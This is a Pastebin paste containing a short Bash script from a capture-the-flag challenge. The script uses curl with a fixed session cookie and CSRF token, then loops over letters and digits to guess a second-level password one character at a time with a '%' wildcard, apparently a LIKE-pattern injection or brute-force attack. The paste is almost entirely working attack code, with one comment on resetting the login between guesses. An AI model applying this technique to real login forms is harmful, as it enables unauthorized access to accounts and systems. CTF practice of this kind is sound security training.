Advertisement
Guest User

Untitled

a guest
Jul 22nd, 2013
465
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.99 KB | None | 0 0
  1. ff=""
  2. curl --silent --cookie "PHPSESSID=il5gaeg4jsopmcdiqq4on80cq5" "http://a1galaxy.tasks.ufoctf.ru/?getback"
  3. curl --silent --cookie "PHPSESSID=il5gaeg4jsopmcdiqq4on80cq5" -d "username=admin1&password=MyPasswordIsNotTheFlag&csrf_token=2bb211be9683b674066d16405f9439aa&confirm=yes" "http://a1galaxy.tasks.ufoctf.ru/?"
  4.  
  5. # ^^^ these queries are sended in case the query don't match a char. so i re-start the auth else i could not continue brute-ing.
  6.  
  7. for i in {a..z}; do
  8.     echo $i
  9.     curl --silent --cookie "PHPSESSID=il5gaeg4jsopmcdiqq4on80cq5" -d "username=admin1&level1_password=MyPasswordIsNotTheFlag&level2_password="$ff$i"%"&csrf_token=6680b3127ff1df4704f8cededb92dbec&confirm=yes" "http://a1galaxy.tasks.ufoctf.ru/?"
  10. done
  11. for i in {0..9}; do
  12.     echo $i
  13.     curl --silent --cookie "PHPSESSID=il5gaeg4jsopmcdiqq4on80cq5" -d "username=admin1&level1_password=MyPasswordIsNotTheFlag&level2_password="$ff$i"%"&csrf_token=6680b3127ff1df4704f8cededb92dbec&confirm=yes" "http://a1galaxy.tasks.ufoctf.ru/?"
  14. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement